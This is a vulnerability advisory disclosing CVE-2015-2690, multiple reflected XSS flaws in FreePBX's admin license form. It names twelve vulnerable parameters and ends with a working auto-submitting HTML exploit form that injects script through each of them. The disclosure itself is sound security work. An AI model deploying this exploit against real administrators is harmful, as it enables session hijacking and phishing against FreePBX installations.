Multiple Cross-Site Scripting (XSS) in FreePBX

High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in FreePBX, which can be exploited to perform Cross-Site Scripting (XSS) attacks against web application administrators. This vulnerability can be used to steal administrator’s cookies, perform phishing and drive-by-download attacks.

1. Multiple XSS vulnerabilities in FreePBX: CVE-2015-2690

Input passed via multiple HTTP POST parameters to “/admin/config.php” script (when “type” is set to “setup”, “display” is set to “digiumaddons”, “page” is set to “add-license-form”, and “addon” is set to “ffa”) is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The vulnerable HTTP POST parameters are: “add_license_key”, “add_license_first_name”, “add_license_last_name”, “add_license_company”, “add_license_address1”, “add_license_address2”, “add_license_city”, “add_license_state”, “add_license_post_code”, “add_license_country”, “add_license_phone”, and “add_license_email”.

The exploitation example below will show JS pop-up displaying “ImmuniWeb”:

<form action=“http://[host]/admin/config.php?type=setup&display=digiumaddons&page= add-license-form&addon=ffa” method=“post” name=“main”>
<input type=“hidden” name=“add_license_key” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_first_name” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_last_name” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_company” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_address1” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_address2” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_city” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_state” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_post_code” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_country” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_phone” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_email” value=‘"><script>alert(“ImmuniWeb”);</script>’>
<input type=“hidden” name=“add_license_submit” value=‘Submit’>
<input type=“submit” id=“btn”>
</form>
<script>document.main.submit()</script>